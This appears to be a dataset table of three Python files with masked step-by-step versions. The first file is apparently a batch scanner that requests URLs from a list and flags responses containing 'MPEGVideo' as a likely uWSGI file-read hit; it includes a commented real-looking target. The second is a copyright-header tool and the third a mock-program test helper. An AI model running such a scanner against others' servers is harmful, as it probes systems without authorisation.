code (stringlengths 13-1.2M) | order_type (stringclasses, 1 value) | original_example (dict) | step_ids (listlengths 1-5) |
---|---|---|---|
#coding=utf-8
import requests,sys
result_url=[]
def main():
counts=open(sys.argv[1]).readlines()
for line in open(sys.argv[1]):
line=line.strip("\n")
url=line
try:
#url="http://s6000.sgcc.com.cn/WebContent/s6000/main/index.jsp#no-back"
r=requests.get(url,verify=True,timeout=3)
print(url+" "+str(r.status_code))
print(str(r.text))
if r.status_code==200 and "MPEGVideo" in r.text:
result_url.append(url)
except Exception as e:
print(str(e))
for i in result_url:
print(i)
file_200.write(i+"\n")
if __name__ == '__main__':
file_200=open("result_uWSGI_file.txt","w")
main()
file_200.flush()
file_200.close()
|
normal
|
{
"blob_id": "96a4659f03879e051af95b5aa9c1e1364015fb86",
"index": 8723,
"step-1": "<mask token>\n\n\ndef main():\n counts = open(sys.argv[1]).readlines()\n for line in open(sys.argv[1]):\n line = line.strip('\\n')\n url = line\n try:\n r = requests.get(url, verify=True, timeout=3)\n print(url + ' ' + str(r.status_code))\n print(str(r.text))\n if r.status_code == 200 and 'MPEGVideo' in r.text:\n result_url.append(url)\n except Exception as e:\n print(str(e))\n for i in result_url:\n print(i)\n file_200.write(i + '\\n')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n counts = open(sys.argv[1]).readlines()\n for line in open(sys.argv[1]):\n line = line.strip('\\n')\n url = line\n try:\n r = requests.get(url, verify=True, timeout=3)\n print(url + ' ' + str(r.status_code))\n print(str(r.text))\n if r.status_code == 200 and 'MPEGVideo' in r.text:\n result_url.append(url)\n except Exception as e:\n print(str(e))\n for i in result_url:\n print(i)\n file_200.write(i + '\\n')\n\n\nif __name__ == '__main__':\n file_200 = open('result_uWSGI_file.txt', 'w')\n main()\n file_200.flush()\n file_200.close()\n",
"step-3": "<mask token>\nresult_url = []\n\n\ndef main():\n counts = open(sys.argv[1]).readlines()\n for line in open(sys.argv[1]):\n line = line.strip('\\n')\n url = line\n try:\n r = requests.get(url, verify=True, timeout=3)\n print(url + ' ' + str(r.status_code))\n print(str(r.text))\n if r.status_code == 200 and 'MPEGVideo' in r.text:\n result_url.append(url)\n except Exception as e:\n print(str(e))\n for i in result_url:\n print(i)\n file_200.write(i + '\\n')\n\n\nif __name__ == '__main__':\n file_200 = open('result_uWSGI_file.txt', 'w')\n main()\n file_200.flush()\n file_200.close()\n",
"step-4": "import requests, sys\nresult_url = []\n\n\ndef main():\n counts = open(sys.argv[1]).readlines()\n for line in open(sys.argv[1]):\n line = line.strip('\\n')\n url = line\n try:\n r = requests.get(url, verify=True, timeout=3)\n print(url + ' ' + str(r.status_code))\n print(str(r.text))\n if r.status_code == 200 and 'MPEGVideo' in r.text:\n result_url.append(url)\n except Exception as e:\n print(str(e))\n for i in result_url:\n print(i)\n file_200.write(i + '\\n')\n\n\nif __name__ == '__main__':\n file_200 = open('result_uWSGI_file.txt', 'w')\n main()\n file_200.flush()\n file_200.close()\n",
"step-5": "#coding=utf-8\r\nimport requests,sys\r\nresult_url=[]\r\n\r\ndef main():\r\n counts=open(sys.argv[1]).readlines()\r\n for line in open(sys.argv[1]):\r\n line=line.strip(\"\\n\")\r\n url=line\r\n try:\r\n #url=\"http://s6000.sgcc.com.cn/WebContent/s6000/main/index.jsp#no-back\"\r\n r=requests.get(url,verify=True,timeout=3)\r\n print(url+\" \"+str(r.status_code))\r\n print(str(r.text))\r\n if r.status_code==200 and \"MPEGVideo\" in r.text:\r\n result_url.append(url) \r\n except Exception as e:\r\n print(str(e))\r\n for i in result_url:\r\n print(i)\r\n file_200.write(i+\"\\n\")\r\n\r\nif __name__ == '__main__':\r\n file_200=open(\"result_uWSGI_file.txt\",\"w\") \r\n main()\r\n file_200.flush() \r\n file_200.close() \r\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# Copyright (C) 2020 Francis Sun, all rights reserved.
"""A copyright utility"""
import datetime
import argparse
import os
import os.path
class Copyright:
_file_type = {
'c/c++': ['h', 'c', 'cpp', 'cc'],
'python': ['py'],
'cmake': ['cmake'],
'vim': ['vim'],
'shell': ['sh']
}
_declaration = "Copyright (C) {0} {1}, all rights reserved."
_formaters = {}
def __init__(self, file_path, author):
self.file_path = file_path
self.author = author
file_name = self.file_path.split(os.path.sep)[-1]
if file_name == 'CMakeLists.txt':
self.file_type = 'cmake'
elif file_name == 'vimrc':
self.file_type = 'vim'
else:
self.file_type = self.file_path.split('.')[-1]
self.declaration = Copyright._declaration.format(
datetime.date.today().year, self.author)
def _c_cpp_formater(self):
return "/* " + self.declaration + " */"
for ft in _file_type['c/c++']:
_formaters[ft] = _c_cpp_formater
def _py_formater(self):
return "# " + self.declaration
for ft in _file_type['python']:
_formaters[ft] = _py_formater
def _cmake_formater(self):
return "# " + self.declaration
for ft in _file_type['cmake']:
_formaters[ft] = _cmake_formater
def _vim_formater(self):
return "\" " + self.declaration
for ft in _file_type['vim']:
_formaters[ft] = _vim_formater
def _shell_formater(self):
return "# " + self.declaration
for ft in _file_type['shell']:
_formaters[ft] = _shell_formater
def get_declaration(self):
if self.file_type in Copyright._formaters:
return Copyright._formaters[self.file_type](self)
tmp_filename_suffix = ".fjcu"
def Write(self):
tmp_filename = self.file_path + Copyright.tmp_filename_suffix
with open(tmp_filename, 'w') as tmp_f:
origin_content = ""
if os.path.isfile(self.file_path):
with open(self.file_path, 'r') as origin_f:
origin_content = origin_f.read()
tmp_f.write(self.get_declaration() + "\n" + origin_content)
os.replace(tmp_filename, self.file_path)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('file_path')
parser.add_argument('author')
opt = parser.parse_args()
cr = Copyright(opt.file_path, opt.author)
cr.Write()
|
normal
|
{
"blob_id": "dc05a441c21a67fbb3a1975b3fccb865a32731c8",
"index": 4642,
"step-1": "<mask token>\n\n\nclass Copyright:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def _c_cpp_formater(self):\n return '/* ' + self.declaration + ' */'\n for ft in _file_type['c/c++']:\n _formaters[ft] = _c_cpp_formater\n <mask token>\n for ft in _file_type['python']:\n _formaters[ft] = _py_formater\n\n def _cmake_formater(self):\n return '# ' + self.declaration\n for ft in _file_type['cmake']:\n _formaters[ft] = _cmake_formater\n <mask token>\n for ft in _file_type['vim']:\n _formaters[ft] = _vim_formater\n\n def _shell_formater(self):\n return '# ' + self.declaration\n for ft in _file_type['shell']:\n _formaters[ft] = _shell_formater\n <mask token>\n <mask token>\n\n def Write(self):\n tmp_filename = self.file_path + Copyright.tmp_filename_suffix\n with open(tmp_filename, 'w') as tmp_f:\n origin_content = ''\n if os.path.isfile(self.file_path):\n with open(self.file_path, 'r') as origin_f:\n origin_content = origin_f.read()\n tmp_f.write(self.get_declaration() + '\\n' + origin_content)\n os.replace(tmp_filename, self.file_path)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Copyright:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def _c_cpp_formater(self):\n return '/* ' + self.declaration + ' */'\n for ft in _file_type['c/c++']:\n _formaters[ft] = _c_cpp_formater\n\n def _py_formater(self):\n return '# ' + self.declaration\n for ft in _file_type['python']:\n _formaters[ft] = _py_formater\n\n def _cmake_formater(self):\n return '# ' + self.declaration\n for ft in _file_type['cmake']:\n _formaters[ft] = _cmake_formater\n <mask token>\n for ft in _file_type['vim']:\n _formaters[ft] = _vim_formater\n\n def _shell_formater(self):\n return '# ' + self.declaration\n for ft in _file_type['shell']:\n _formaters[ft] = _shell_formater\n\n def get_declaration(self):\n if self.file_type in Copyright._formaters:\n return Copyright._formaters[self.file_type](self)\n <mask token>\n\n def Write(self):\n tmp_filename = self.file_path + Copyright.tmp_filename_suffix\n with open(tmp_filename, 'w') as tmp_f:\n origin_content = ''\n if os.path.isfile(self.file_path):\n with open(self.file_path, 'r') as origin_f:\n origin_content = origin_f.read()\n tmp_f.write(self.get_declaration() + '\\n' + origin_content)\n os.replace(tmp_filename, self.file_path)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Copyright:\n _file_type = {'c/c++': ['h', 'c', 'cpp', 'cc'], 'python': ['py'],\n 'cmake': ['cmake'], 'vim': ['vim'], 'shell': ['sh']}\n _declaration = 'Copyright (C) {0} {1}, all rights reserved.'\n _formaters = {}\n\n def __init__(self, file_path, author):\n self.file_path = file_path\n self.author = author\n file_name = self.file_path.split(os.path.sep)[-1]\n if file_name == 'CMakeLists.txt':\n self.file_type = 'cmake'\n elif file_name == 'vimrc':\n self.file_type = 'vim'\n else:\n self.file_type = self.file_path.split('.')[-1]\n self.declaration = Copyright._declaration.format(datetime.date.\n today().year, self.author)\n\n def _c_cpp_formater(self):\n return '/* ' + self.declaration + ' */'\n for ft in _file_type['c/c++']:\n _formaters[ft] = _c_cpp_formater\n\n def _py_formater(self):\n return '# ' + self.declaration\n for ft in _file_type['python']:\n _formaters[ft] = _py_formater\n\n def _cmake_formater(self):\n return '# ' + self.declaration\n for ft in _file_type['cmake']:\n _formaters[ft] = _cmake_formater\n\n def _vim_formater(self):\n return '\" ' + self.declaration\n for ft in _file_type['vim']:\n _formaters[ft] = _vim_formater\n\n def _shell_formater(self):\n return '# ' + self.declaration\n for ft in _file_type['shell']:\n _formaters[ft] = _shell_formater\n\n def get_declaration(self):\n if self.file_type in Copyright._formaters:\n return Copyright._formaters[self.file_type](self)\n tmp_filename_suffix = '.fjcu'\n\n def Write(self):\n tmp_filename = self.file_path + Copyright.tmp_filename_suffix\n with open(tmp_filename, 'w') as tmp_f:\n origin_content = ''\n if os.path.isfile(self.file_path):\n with open(self.file_path, 'r') as origin_f:\n origin_content = origin_f.read()\n tmp_f.write(self.get_declaration() + '\\n' + origin_content)\n os.replace(tmp_filename, self.file_path)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('file_path')\n parser.add_argument('author')\n opt = parser.parse_args()\n cr = Copyright(opt.file_path, opt.author)\n cr.Write()\n",
"step-4": "<mask token>\nimport datetime\nimport argparse\nimport os\nimport os.path\n\n\nclass Copyright:\n _file_type = {'c/c++': ['h', 'c', 'cpp', 'cc'], 'python': ['py'],\n 'cmake': ['cmake'], 'vim': ['vim'], 'shell': ['sh']}\n _declaration = 'Copyright (C) {0} {1}, all rights reserved.'\n _formaters = {}\n\n def __init__(self, file_path, author):\n self.file_path = file_path\n self.author = author\n file_name = self.file_path.split(os.path.sep)[-1]\n if file_name == 'CMakeLists.txt':\n self.file_type = 'cmake'\n elif file_name == 'vimrc':\n self.file_type = 'vim'\n else:\n self.file_type = self.file_path.split('.')[-1]\n self.declaration = Copyright._declaration.format(datetime.date.\n today().year, self.author)\n\n def _c_cpp_formater(self):\n return '/* ' + self.declaration + ' */'\n for ft in _file_type['c/c++']:\n _formaters[ft] = _c_cpp_formater\n\n def _py_formater(self):\n return '# ' + self.declaration\n for ft in _file_type['python']:\n _formaters[ft] = _py_formater\n\n def _cmake_formater(self):\n return '# ' + self.declaration\n for ft in _file_type['cmake']:\n _formaters[ft] = _cmake_formater\n\n def _vim_formater(self):\n return '\" ' + self.declaration\n for ft in _file_type['vim']:\n _formaters[ft] = _vim_formater\n\n def _shell_formater(self):\n return '# ' + self.declaration\n for ft in _file_type['shell']:\n _formaters[ft] = _shell_formater\n\n def get_declaration(self):\n if self.file_type in Copyright._formaters:\n return Copyright._formaters[self.file_type](self)\n tmp_filename_suffix = '.fjcu'\n\n def Write(self):\n tmp_filename = self.file_path + Copyright.tmp_filename_suffix\n with open(tmp_filename, 'w') as tmp_f:\n origin_content = ''\n if os.path.isfile(self.file_path):\n with open(self.file_path, 'r') as origin_f:\n origin_content = origin_f.read()\n tmp_f.write(self.get_declaration() + '\\n' + origin_content)\n os.replace(tmp_filename, self.file_path)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('file_path')\n parser.add_argument('author')\n opt = parser.parse_args()\n cr = Copyright(opt.file_path, opt.author)\n cr.Write()\n",
"step-5": "# Copyright (C) 2020 Francis Sun, all rights reserved.\n\n\"\"\"A copyright utility\"\"\"\n\nimport datetime\nimport argparse\nimport os\nimport os.path\n\n\nclass Copyright:\n _file_type = {\n 'c/c++': ['h', 'c', 'cpp', 'cc'],\n 'python': ['py'],\n 'cmake': ['cmake'],\n 'vim': ['vim'],\n 'shell': ['sh']\n }\n _declaration = \"Copyright (C) {0} {1}, all rights reserved.\"\n _formaters = {}\n\n def __init__(self, file_path, author):\n self.file_path = file_path\n self.author = author\n file_name = self.file_path.split(os.path.sep)[-1]\n\n if file_name == 'CMakeLists.txt':\n self.file_type = 'cmake'\n elif file_name == 'vimrc':\n self.file_type = 'vim'\n else:\n self.file_type = self.file_path.split('.')[-1]\n\n self.declaration = Copyright._declaration.format(\n datetime.date.today().year, self.author)\n\n def _c_cpp_formater(self):\n return \"/* \" + self.declaration + \" */\"\n for ft in _file_type['c/c++']:\n _formaters[ft] = _c_cpp_formater\n\n def _py_formater(self):\n return \"# \" + self.declaration\n for ft in _file_type['python']:\n _formaters[ft] = _py_formater\n\n def _cmake_formater(self):\n return \"# \" + self.declaration\n for ft in _file_type['cmake']:\n _formaters[ft] = _cmake_formater\n\n def _vim_formater(self):\n return \"\\\" \" + self.declaration\n for ft in _file_type['vim']:\n _formaters[ft] = _vim_formater\n\n def _shell_formater(self):\n return \"# \" + self.declaration\n for ft in _file_type['shell']:\n _formaters[ft] = _shell_formater\n\n def get_declaration(self):\n if self.file_type in Copyright._formaters:\n return Copyright._formaters[self.file_type](self)\n\n tmp_filename_suffix = \".fjcu\"\n\n def Write(self):\n tmp_filename = self.file_path + Copyright.tmp_filename_suffix\n with open(tmp_filename, 'w') as tmp_f:\n origin_content = \"\"\n if os.path.isfile(self.file_path):\n with open(self.file_path, 'r') as origin_f:\n origin_content = origin_f.read()\n tmp_f.write(self.get_declaration() + \"\\n\" + origin_content)\n os.replace(tmp_filename, self.file_path)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('file_path')\n parser.add_argument('author')\n opt = parser.parse_args()\n cr = Copyright(opt.file_path, opt.author)\n cr.Write()\n",
"step-ids": [
5,
7,
11,
12,
13
]
}
|
[
5,
7,
11,
12,
13
] |
#!/usr/bin/env python
# @HEADER
# ************************************************************************
#
# TriBITS: Tribal Build, Integrate, and Test System
# Copyright 2013 Sandia Corporation
#
# Under the terms of Contract DE-AC04-94AL85000 with Sandia Corporation,
# the U.S. Government retains certain rights in this software.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the Corporation nor the names of the
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY SANDIA CORPORATION "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL SANDIA CORPORATION OR THE
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# ************************************************************************
# @HEADER
#
# Usage: mockprogram.py [any arguments]
#
# Mock program that takes input arguments and produces stdout by reading from
# a file .mockprogram_inout.txt in the current directory or the file specified
# by the env var MOCKPROGRAM_INOUT_FILE_OVERRIDE (which can be in any
# directory). This script is used to take the place of real commands during a
# test that involves calling commands on the commandline.
#
# The file .mockprogram_inout.txt (or pointed to by
# MOCKPROGRAM_INOUT_FILE_OVERRIDE) is of the form:
#
# MOCK_PROGRAM_INPUT: <args_1>
# MOCK_PROGRAM_RETURN: <rtn>
# MOCK_PROGRAM_OUTPUT: <outline_1_line_1>
# <outline_1_line_2>
# ...
# MOCK_PROGRAM_INPUT: <args_2>
#
# The program reads in the blocks starting at the time and removes the block
# from the file after it runs. After all of the blocks are read in, if run
# again it will error out with error code 2.
#
# This program can be used, for example, to simulate git command. For
# example, a couple of git commits might be simulated like:
#
# MOCK_PROGRAM_INPUT: log -1
# MOCK_PROGRAM_RETURN: 0
# MOCK_PROGRAM_OUTPUT: This is the summary line
#
# The is the body of the commit msg
# MOCK_PROGRAM_INPUT: diff --name-only HEAD --not @{u}
# MOCK_PROGRAM_RETURN: 0
# MOCK_PROGRAM_OUTPUT: file_name_1.txt
# file_name_2.txt
# file_name_3.txt
#
import sys
import os
inputArgs = ' '.join(sys.argv[1:])
#print("inputArgs = '" + inputArgs + "'"
if os.environ.get("MOCKPROGRAM_INOUT_FILE_OVERRIDE"):
mockProgramInOutFilePath=os.environ.get("MOCKPROGRAM_INOUT_FILE_OVERRIDE")
else:
mockProgramInOutFilePath='.mockprogram_inout.txt'
if not os.path.exists(mockProgramInOutFilePath):
print("Error: "+mockProgramInOutFilePath+" is missing!")
sys.exit(1)
mockprogramInout = open(mockProgramInOutFilePath, 'r').read()
mockprogramInoutArray = mockprogramInout.splitlines()
if len(mockprogramInoutArray) and mockprogramInoutArray[-1] == "":
mockprogramInoutArray = mockprogramInoutArray[:-1]
if len(mockprogramInoutArray) < 3:
print("Error: "+mockProgramInOutFilePath+" has less than three lines:\n"
"-------------\n" + mockprogramInout + "-------------")
sys.exit(2)
# Assert input
expectedInputLine = mockprogramInoutArray[0]
if expectedInputLine.find("MOCK_PROGRAM_INPUT:") != 0:
print("Error, first line = '" + expectedInputLine + "', does not match "
"^MOCK_PROGRAM_INPUT:")
sys.exit(3)
expectedInput = expectedInputLine.replace("MOCK_PROGRAM_INPUT:", "").strip()
if inputArgs != expectedInput:
print("Error, input args='" + inputArgs + "' does not match expected='" +
expectedInput + "'")
sys.exit(4)
# Get return code
returnCodeLine = mockprogramInoutArray[1]
if returnCodeLine.find("MOCK_PROGRAM_RETURN:") != 0:
print("Error, second line = '" + returnCodeLine + "', does not match "
"^MOCK_PROGRAM_RETURN:")
sys.exit(5)
returnCode = returnCodeLine.replace("MOCK_PROGRAM_RETURN:", "").strip()
# Get output (can be multi-line)
outputLine = mockprogramInoutArray[2]
if outputLine.find("MOCK_PROGRAM_OUTPUT:") != 0:
print("Error, third line = '" + outputLine + "', does not match "
"^MOCK_PROGRAM_OUTPUT:")
sys.exit(6)
outputStr = outputLine.replace("MOCK_PROGRAM_OUTPUT: ", "")
numLinesOuput = 1
if len(mockprogramInoutArray) > 3:
for line in mockprogramInoutArray[3:]:
if line.find("MOCK_PROGRAM_INPUT:") == 0:
break
outputStr = outputStr+"\n"+line
numLinesOuput = numLinesOuput + 1
print(outputStr)
# Write the remaining lines back into the file
lineLineIndex = 2 + numLinesOuput
if len(mockprogramInoutArray) > lineLineIndex:
open(mockProgramInOutFilePath, 'w').write(
('\n'.join(mockprogramInoutArray[lineLineIndex:]))+"\n" )
else:
open(mockProgramInOutFilePath, 'w').write("")
# Return exit code
sys.exit(int(returnCode))
|
normal
|
{
"blob_id": "550f5ad4fef77d5795db0393ae0701f679143e72",
"index": 221,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif os.environ.get('MOCKPROGRAM_INOUT_FILE_OVERRIDE'):\n mockProgramInOutFilePath = os.environ.get('MOCKPROGRAM_INOUT_FILE_OVERRIDE'\n )\nelse:\n mockProgramInOutFilePath = '.mockprogram_inout.txt'\nif not os.path.exists(mockProgramInOutFilePath):\n print('Error: ' + mockProgramInOutFilePath + ' is missing!')\n sys.exit(1)\n<mask token>\nif len(mockprogramInoutArray) and mockprogramInoutArray[-1] == '':\n mockprogramInoutArray = mockprogramInoutArray[:-1]\nif len(mockprogramInoutArray) < 3:\n print('Error: ' + mockProgramInOutFilePath +\n ' has less than three lines:\\n-------------\\n' + mockprogramInout +\n '-------------')\n sys.exit(2)\n<mask token>\nif expectedInputLine.find('MOCK_PROGRAM_INPUT:') != 0:\n print(\"Error, first line = '\" + expectedInputLine +\n \"', does not match ^MOCK_PROGRAM_INPUT:\")\n sys.exit(3)\n<mask token>\nif inputArgs != expectedInput:\n print(\"Error, input args='\" + inputArgs + \"' does not match expected='\" +\n expectedInput + \"'\")\n sys.exit(4)\n<mask token>\nif returnCodeLine.find('MOCK_PROGRAM_RETURN:') != 0:\n print(\"Error, second line = '\" + returnCodeLine +\n \"', does not match ^MOCK_PROGRAM_RETURN:\")\n sys.exit(5)\n<mask token>\nif outputLine.find('MOCK_PROGRAM_OUTPUT:') != 0:\n print(\"Error, third line = '\" + outputLine +\n \"', does not match ^MOCK_PROGRAM_OUTPUT:\")\n sys.exit(6)\n<mask token>\nif len(mockprogramInoutArray) > 3:\n for line in mockprogramInoutArray[3:]:\n if line.find('MOCK_PROGRAM_INPUT:') == 0:\n break\n outputStr = outputStr + '\\n' + line\n numLinesOuput = numLinesOuput + 1\nprint(outputStr)\n<mask token>\nif len(mockprogramInoutArray) > lineLineIndex:\n open(mockProgramInOutFilePath, 'w').write('\\n'.join(\n mockprogramInoutArray[lineLineIndex:]) + '\\n')\nelse:\n open(mockProgramInOutFilePath, 'w').write('')\nsys.exit(int(returnCode))\n",
"step-3": "<mask token>\ninputArgs = ' '.join(sys.argv[1:])\nif os.environ.get('MOCKPROGRAM_INOUT_FILE_OVERRIDE'):\n mockProgramInOutFilePath = os.environ.get('MOCKPROGRAM_INOUT_FILE_OVERRIDE'\n )\nelse:\n mockProgramInOutFilePath = '.mockprogram_inout.txt'\nif not os.path.exists(mockProgramInOutFilePath):\n print('Error: ' + mockProgramInOutFilePath + ' is missing!')\n sys.exit(1)\nmockprogramInout = open(mockProgramInOutFilePath, 'r').read()\nmockprogramInoutArray = mockprogramInout.splitlines()\nif len(mockprogramInoutArray) and mockprogramInoutArray[-1] == '':\n mockprogramInoutArray = mockprogramInoutArray[:-1]\nif len(mockprogramInoutArray) < 3:\n print('Error: ' + mockProgramInOutFilePath +\n ' has less than three lines:\\n-------------\\n' + mockprogramInout +\n '-------------')\n sys.exit(2)\nexpectedInputLine = mockprogramInoutArray[0]\nif expectedInputLine.find('MOCK_PROGRAM_INPUT:') != 0:\n print(\"Error, first line = '\" + expectedInputLine +\n \"', does not match ^MOCK_PROGRAM_INPUT:\")\n sys.exit(3)\nexpectedInput = expectedInputLine.replace('MOCK_PROGRAM_INPUT:', '').strip()\nif inputArgs != expectedInput:\n print(\"Error, input args='\" + inputArgs + \"' does not match expected='\" +\n expectedInput + \"'\")\n sys.exit(4)\nreturnCodeLine = mockprogramInoutArray[1]\nif returnCodeLine.find('MOCK_PROGRAM_RETURN:') != 0:\n print(\"Error, second line = '\" + returnCodeLine +\n \"', does not match ^MOCK_PROGRAM_RETURN:\")\n sys.exit(5)\nreturnCode = returnCodeLine.replace('MOCK_PROGRAM_RETURN:', '').strip()\noutputLine = mockprogramInoutArray[2]\nif outputLine.find('MOCK_PROGRAM_OUTPUT:') != 0:\n print(\"Error, third line = '\" + outputLine +\n \"', does not match ^MOCK_PROGRAM_OUTPUT:\")\n sys.exit(6)\noutputStr = outputLine.replace('MOCK_PROGRAM_OUTPUT: ', '')\nnumLinesOuput = 1\nif len(mockprogramInoutArray) > 3:\n for line in mockprogramInoutArray[3:]:\n if line.find('MOCK_PROGRAM_INPUT:') == 0:\n break\n outputStr = outputStr + '\\n' + line\n numLinesOuput = numLinesOuput + 1\nprint(outputStr)\nlineLineIndex = 2 + numLinesOuput\nif len(mockprogramInoutArray) > lineLineIndex:\n open(mockProgramInOutFilePath, 'w').write('\\n'.join(\n mockprogramInoutArray[lineLineIndex:]) + '\\n')\nelse:\n open(mockProgramInOutFilePath, 'w').write('')\nsys.exit(int(returnCode))\n",
"step-4": "import sys\nimport os\ninputArgs = ' '.join(sys.argv[1:])\nif os.environ.get('MOCKPROGRAM_INOUT_FILE_OVERRIDE'):\n mockProgramInOutFilePath = os.environ.get('MOCKPROGRAM_INOUT_FILE_OVERRIDE'\n )\nelse:\n mockProgramInOutFilePath = '.mockprogram_inout.txt'\nif not os.path.exists(mockProgramInOutFilePath):\n print('Error: ' + mockProgramInOutFilePath + ' is missing!')\n sys.exit(1)\nmockprogramInout = open(mockProgramInOutFilePath, 'r').read()\nmockprogramInoutArray = mockprogramInout.splitlines()\nif len(mockprogramInoutArray) and mockprogramInoutArray[-1] == '':\n mockprogramInoutArray = mockprogramInoutArray[:-1]\nif len(mockprogramInoutArray) < 3:\n print('Error: ' + mockProgramInOutFilePath +\n ' has less than three lines:\\n-------------\\n' + mockprogramInout +\n '-------------')\n sys.exit(2)\nexpectedInputLine = mockprogramInoutArray[0]\nif expectedInputLine.find('MOCK_PROGRAM_INPUT:') != 0:\n print(\"Error, first line = '\" + expectedInputLine +\n \"', does not match ^MOCK_PROGRAM_INPUT:\")\n sys.exit(3)\nexpectedInput = expectedInputLine.replace('MOCK_PROGRAM_INPUT:', '').strip()\nif inputArgs != expectedInput:\n print(\"Error, input args='\" + inputArgs + \"' does not match expected='\" +\n expectedInput + \"'\")\n sys.exit(4)\nreturnCodeLine = mockprogramInoutArray[1]\nif returnCodeLine.find('MOCK_PROGRAM_RETURN:') != 0:\n print(\"Error, second line = '\" + returnCodeLine +\n \"', does not match ^MOCK_PROGRAM_RETURN:\")\n sys.exit(5)\nreturnCode = returnCodeLine.replace('MOCK_PROGRAM_RETURN:', '').strip()\noutputLine = mockprogramInoutArray[2]\nif outputLine.find('MOCK_PROGRAM_OUTPUT:') != 0:\n print(\"Error, third line = '\" + outputLine +\n \"', does not match ^MOCK_PROGRAM_OUTPUT:\")\n sys.exit(6)\noutputStr = outputLine.replace('MOCK_PROGRAM_OUTPUT: ', '')\nnumLinesOuput = 1\nif len(mockprogramInoutArray) > 3:\n for line in mockprogramInoutArray[3:]:\n if line.find('MOCK_PROGRAM_INPUT:') == 0:\n break\n outputStr = outputStr + '\\n' + line\n numLinesOuput = numLinesOuput + 1\nprint(outputStr)\nlineLineIndex = 2 + numLinesOuput\nif len(mockprogramInoutArray) > lineLineIndex:\n open(mockProgramInOutFilePath, 'w').write('\\n'.join(\n mockprogramInoutArray[lineLineIndex:]) + '\\n')\nelse:\n open(mockProgramInOutFilePath, 'w').write('')\nsys.exit(int(returnCode))\n",
"step-5": "#!/usr/bin/env python\n\n# @HEADER\n# ************************************************************************\n#\n# TriBITS: Tribal Build, Integrate, and Test System\n# Copyright 2013 Sandia Corporation\n#\n# Under the terms of Contract DE-AC04-94AL85000 with Sandia Corporation,\n# the U.S. Government retains certain rights in this software.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# 3. Neither the name of the Corporation nor the names of the\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY SANDIA CORPORATION \"AS IS\" AND ANY\n# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL SANDIA CORPORATION OR THE\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n# ************************************************************************\n# @HEADER\n\n#\n# Usage: mockprogram.py [any arguments]\n#\n# Mock program that takes input arguments and produces stdout by reading from\n# a file .mockprogram_inout.txt in the current directory or the file specified\n# by the env var MOCKPROGRAM_INOUT_FILE_OVERRIDE (which can be in any\n# directory). This script is used to take the place of real commands during a\n# test that involves calling commands on the commandline.\n#\n# The file .mockprogram_inout.txt (or pointed to by\n# MOCKPROGRAM_INOUT_FILE_OVERRIDE) is of the form:\n#\n# MOCK_PROGRAM_INPUT: <args_1>\n# MOCK_PROGRAM_RETURN: <rtn>\n# MOCK_PROGRAM_OUTPUT: <outline_1_line_1>\n# <outline_1_line_2>\n# ...\n# MOCK_PROGRAM_INPUT: <args_2>\n#\n# The program reads in the blocks starting at the time and removes the block\n# from the file after it runs. After all of the blocks are read in, if run\n# again it will error out with error code 2.\n#\n# This program can be used, for example, to simulate git command. 
